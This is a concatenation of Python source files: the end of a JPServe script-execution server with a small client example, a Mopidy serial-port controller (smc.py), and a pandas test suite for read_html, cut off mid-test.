def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
        ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
self.stopped = False
def shutdown(self):
self.stopped = True
ThreadingTCPServer.shutdown(self)
class PForkingTCPServer(ForkingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
        ForkingTCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
self.stopped = False
def shutdown(self):
self.stopped = True
ForkingTCPServer.shutdown(self)
if __name__ == "__main__":
host = "localhost"
port = 8888
addr = (host, port)
jpserve = JPServe(addr)
jpserve.start()
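# Illustrative client sketch (not part of the original module): a minimal
# Python counterpart of the Java PyClient shown in the module docstring. It
# speaks the wire protocol documented in ServeHandler over a plain socket;
# host/port default to the values used in __main__ above.
def example_exec(script, host="localhost", port=8888):
    import socket
    with socket.create_connection((host, port)) as sock:
        f = sock.makefile("rwb")
        # Send: begin mark, script lines, end mark
        f.write(b"#!{\r\n" + script.encode("utf-8") + b"\r\n#!}\r\n")
        f.flush()
        # Read the response until the closing end mark, keeping only the JSON body
        payload = []
        while True:
            line = f.readline()
            if not line or line.strip() == END_MARK:
                break
            if line.strip() != BEGIN_MARK:
                payload.append(line.decode("utf-8"))
        f.write(CMD_EXIT + b"\r\n")
        f.flush()
    return json.loads("".join(payload))
# Example: example_exec("a = 2\r\nb = 3\r\n_result_ = a * b") -> {"result": "6", ...}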
|
smc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import threading
import re
import logging
import serial
import pykka
from mopidy import exceptions
from mopidy.utils import encoding
logger = logging.getLogger(__name__)
class SerialMonoboxController(pykka.ThreadingActor):
def __init__(self, frontend, serial_port, serial_bps):
super(SerialMonoboxController, self).__init__()
try:
self.s = serial.Serial(serial_port, serial_bps, timeout=0.5)
except Exception as error:
raise exceptions.FrontendError('SMC serial connection failed: %s' %
encoding.locale_decode(error))
self.frontend = frontend
self.buffer = ''
def on_start(self):
self.s.flushInput()
thread = threading.Thread(target=self.thread_run)
thread.start()
def on_stop(self):
self.running = False
def thread_run(self):
self.running = True
while self.running:
ch = self.s.read()
if ch not in ('', '\r'):
self.buffer += ch
# logger.debug('SMC buf: %s' % str([c for c in self.buffer]))
while '\n' in self.buffer:
self.process_line(self.buffer[0:self.buffer.find('\n')])
self.buffer = self.buffer[self.buffer.find('\n') + 1:]
def process_parsed(self, typ, value):
if typ == 'P':
self.frontend.set_power_control(value)
elif typ == 'V':
self.frontend.set_volume(value)
elif typ == 'B' and value == 1:
self.frontend.next_button_pressed()
def process_line(self, line):
logger.debug('SMC process line: %s' % line)
res = re.search(r'^([BPV]):(\-?\d+)$', line)
if res:
typ, value = res.groups()
try:
value = int(value)
except ValueError:
logger.warning('Cannot decode value %s (line=%s)' % (value, line))
else:
self.process_parsed(typ, value)
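# Illustrative note (not part of the original module): the controller expects
# newline-terminated serial lines of the form "<type>:<value>", e.g. "V:12"
# (volume), "P:1" (power) or "B:1" (button press). A standalone check of the
# same regex used in process_line:
if __name__ == '__main__':
    for sample in ('V:12', 'P:1', 'B:1', 'garbage'):
        res = re.search(r'^([BPV]):(\-?\d+)$', sample)
        print('%s -> %s' % (sample, res.groups() if res else 'ignored'))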
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
